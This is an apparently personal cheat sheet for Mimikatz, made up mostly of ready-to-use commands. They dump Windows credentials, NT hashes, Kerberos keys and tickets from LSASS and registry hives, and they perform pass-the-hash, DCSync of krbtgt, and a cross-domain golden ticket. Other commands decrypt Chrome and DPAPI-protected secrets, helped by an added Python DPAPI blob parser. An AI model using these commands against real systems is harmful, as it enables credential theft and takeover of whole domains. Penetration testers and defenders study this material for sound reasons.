Mimikatz
mimikatz (18.7k ★ on GitHub) is the most popular tool to dump Windows credentials (from LSASS memory, registry hives, DPAPI and the credential manager) and to perform attacks such as Pass-the-Hash and Pass-the-Ticket. The sekurlsa:: commands read LSASS, so they need SeDebugPrivilege (privilege::debug from an elevated prompt); LSA Protection (RunAsPPL) denies the handle to LSASS and Credential Guard keeps the secrets out of it, so on hardened hosts the user-mode path below fails.
PS> .\mimikatz.exe
mimikatz# privilege::debug
mimikatz# # run commands
mimikatz# exit
To dump credentials, hashes, tickets, etc. you can use:
mimikatz# sekurlsa::logonPasswords full # creds of every logged-on session from LSASS memory (cleartext only where WDigest still caches it, otherwise NT hashes)
mimikatz# sekurlsa::ekeys # Kerberos keys of logged-on sessions (aes256/aes128/rc4; the rc4 key is the NT hash)
mimikatz# sekurlsa::dpapi # DPAPI master keys cached in LSASS (GUID + key, to feed dpapi::* /masterkey)
mimikatz# sekurlsa::tickets /export # Kerberos tickets of all sessions, written as .kirbi files
mimikatz# lsadump::sam /system:./system.hive /sam:./sam.hive # offline: local account NT hashes from saved SYSTEM + SAM hives
mimikatz# lsadump::sam /system:./system.hive /sam:./sam.hive /security:./security.hive # variant with the SECURITY hive (LSA secrets and cached domain creds live there; lsadump::secrets and lsadump::cache take /system + /security)
mimikatz# lsadump::lsa /patch # on a DC: hashes of every domain account, by patching LSASS
mimikatz# vault::list # list credential manager vaults
mimikatz# vault::cred # credentials stored in them (/patch for cleartext)
mimikatz# kerberos::list /export # current session's tickets as .kirbi; with base64 /out:true you get base64 on the console instead: cat b64 | tr -d '\n' | base64 -d > cn.kirbi
To perform a pass-the-hash attack using an RC4 or NTLM hash (the same 16-byte key, so /rc4 and /ntlm are interchangeable; /aes256:<key> does the equivalent pass-the-key without an RC4 downgrade). This patches LSASS, so it needs privilege::debug; the spawned process (/run, default cmd.exe) uses the injected key for network authentication only, whoami still shows the local user:
mimikatz# sekurlsa::pth /user:xxx /rc4:XXX /domain:example.com
mimikatz# sekurlsa::pth /user:xxx /rc4:XXX /domain:example.com /run:cmd.exe
mimikatz# sekurlsa::pth /user:xxx /ntlm:XXX /domain:example.com /run:cmd.exe
To perform a DCSync attack (needs directory replication rights: Domain Admins by default, or any principal granted DS-Replication-Get-Changes and DS-Replication-Get-Changes-All; nothing runs on the DC, it is asked to replicate the account like a peer DC would):
mimikatz# lsadump::dcsync /user:example\krbtgt # NT hash + Kerberos keys of krbtgt over the DRSUAPI replication channel
mimikatz# lsadump::dcsync /user:example\krbtgt /domain:example.com # /domain when the target is not the current domain
To decrypt data protected with a DPAPI master key you already hold (the hex key mimikatz prints next to the blob's master key GUID in sekurlsa::dpapi output, or one recovered from the user's %APPDATA%\Microsoft\Protect\<SID>\ files with dpapi::masterkey):
mimikatz# dpapi::blob /in:"encrypted_file" /unprotect /masterkey:xxx # any CryptProtectData blob; xxx = the master key matching the GUID in the blob header
mimikatz# dpapi::chrome /in:".\Login Data" /unprotect /masterkey:xxx # a Login Data SQLite file copied from another user or host
To decrypt Chrome passwords as the logged-on user (no /masterkey: with /unprotect alone the decryption goes through CryptUnprotectData in the user's own context; Chrome 80+ keeps an AES-GCM key, itself DPAPI-wrapped, in the profile's Local State file, so Login Data by itself is not enough there):
mimikatz# dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect
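Picking the right master key: a DPAPI blob names the master key GUID it was protected with in its own header, and sekurlsa::dpapi prints GUID/key pairs, so matching the two tells you which key to pass as /masterkey. The parser below is an added example, not mimikatz code; it walks the CryptProtectData blob layout (version, provider GUID, master key GUID, flags, description, cipher and hash algorithm ids, salt, ciphertext, signature). The sample blob is constructed with filler ciphertext, and SAMPLE_MK_GUID is an assumed value.

```python
import struct
import uuid

DPAPI_PROVIDER = uuid.UUID('df9d8cd0-1501-11d1-8c7a-00c04fc297eb')   # fixed provider GUID in every blob
CALG_NAMES = {0x6603: 'CALG_3DES', 0x6610: 'CALG_AES_256', 0x8004: 'CALG_SHA1', 0x800e: 'CALG_SHA_512'}
SAMPLE_MK_GUID = '3a1f2c44-9b7e-4d6a-8c05-1e2f3a4b5c6d'               # assumed GUID for the constructed sample

def _u32(buf, off):
    return struct.unpack_from('<I', buf, off)[0], off + 4

def _guid(buf, off):                  # GUIDs are stored in little-endian (Windows) layout
    return uuid.UUID(bytes_le=bytes(buf[off:off + 16])), off + 16

def _counted(buf, off):               # DWORD length followed by that many bytes
    n, off = _u32(buf, off)
    return bytes(buf[off:off + n]), off + n

def parse_dpapi_blob(buf):
    """Parse a CryptProtectData blob header; 'masterkey_guid' is the key to look up in sekurlsa::dpapi output."""
    off = 0
    version, off = _u32(buf, off)
    provider, off = _guid(buf, off)
    if version != 1 or provider != DPAPI_PROVIDER:
        raise ValueError('not a DPAPI blob')
    mk_version, off = _u32(buf, off)
    mk_guid, off = _guid(buf, off)
    flags, off = _u32(buf, off)
    description, off = _counted(buf, off)         # UTF-16LE, NUL-terminated
    alg_crypt, off = _u32(buf, off)
    alg_crypt_len, off = _u32(buf, off)           # key length in bits
    salt, off = _counted(buf, off)
    hmac_key, off = _counted(buf, off)            # usually empty
    alg_hash, off = _u32(buf, off)
    alg_hash_len, off = _u32(buf, off)
    hmac2_key, off = _counted(buf, off)
    data, off = _counted(buf, off)                # the ciphertext
    sign, off = _counted(buf, off)                # HMAC over the blob
    if off != len(buf):
        raise ValueError('trailing bytes after blob')
    return {
        'masterkey_guid': str(mk_guid),
        'masterkey_version': mk_version,
        'flags': flags,
        'description': description.decode('utf-16-le').rstrip('\x00'),
        'alg_crypt': CALG_NAMES.get(alg_crypt, hex(alg_crypt)),
        'alg_crypt_len': alg_crypt_len,
        'alg_hash': CALG_NAMES.get(alg_hash, hex(alg_hash)),
        'salt': salt.hex(),
        'data_len': len(data),
        'sign_len': len(sign),
    }

def is_dpapi_blob(buf):
    try:
        parse_dpapi_blob(buf)
        return True
    except (ValueError, struct.error, IndexError):
        return False

def build_sample_blob(mk_guid=SAMPLE_MK_GUID, description='constructed sample', data=b'\x22' * 32):
    """Constructed blob: realistic header (AES-256 + SHA-512, as current Windows writes), filler salt/ciphertext/signature."""
    def counted(b):
        return struct.pack('<I', len(b)) + b
    return (struct.pack('<I', 1) + DPAPI_PROVIDER.bytes_le
            + struct.pack('<I', 1) + uuid.UUID(mk_guid).bytes_le
            + struct.pack('<I', 0)                                    # flags
            + counted((description + '\x00').encode('utf-16-le'))
            + struct.pack('<II', 0x6610, 256) + counted(b'\x11' * 32) + counted(b'')
            + struct.pack('<II', 0x800e, 512) + counted(b'\x33' * 32)
            + counted(data) + counted(b'\x44' * 64))

if __name__ == '__main__':
    for k, v in parse_dpapi_blob(build_sample_blob()).items():
        print(f'{k:18} {v}')
```

For a real file, parse_dpapi_blob(open(path, 'rb').read()) on the raw blob (Chrome's Login Data stores them in the password_value column); the GUID it returns is the one whose key you pass as /masterkey:, and the master key file of that name under %APPDATA%\Microsoft\Protect\<SID>\ is the one to recover if LSASS did not have it cached.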
Request a TGS (service ticket) for an SPN into the current session, e.g. to check that an injected or forged ticket actually works:
mimikatz# kerberos::ask /target:cn # cn = the SPN, e.g. cifs/host.example.com
See also: pypykatz (a pure-Python reimplementation) for Linux users, e.g. to parse an LSASS minidump offline.
To-do
Stuff that I found but have never read/used yet.
Golden ticket (no local admin required, only the krbtgt hash). The /sids: form below is the cross-trust variant: the extra SID is placed in the ticket's SID history so the parent/trusting domain honours it:
mimikatz# kerberos::golden /user:dummy /domain:dev.example.com /sid:<child domain SID> /krbtgt:<hash> /sids:<target domain SID> /ptt # /sids: usually <target domain SID>-519 (Enterprise Admins); /ptt injects it into the current session
Got the following errors and no fix worked. I manually dumped the LSASS memory (40 MB!) and analyzed it on Linux. Otherwise, use Impacket's secretsdump; it works fine.
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000002)
To get base64 on the console instead of .kirbi files from the /export commands (if not already the default; decode it with base64 -d after stripping the line breaks):
mimikatz# base64 /out:true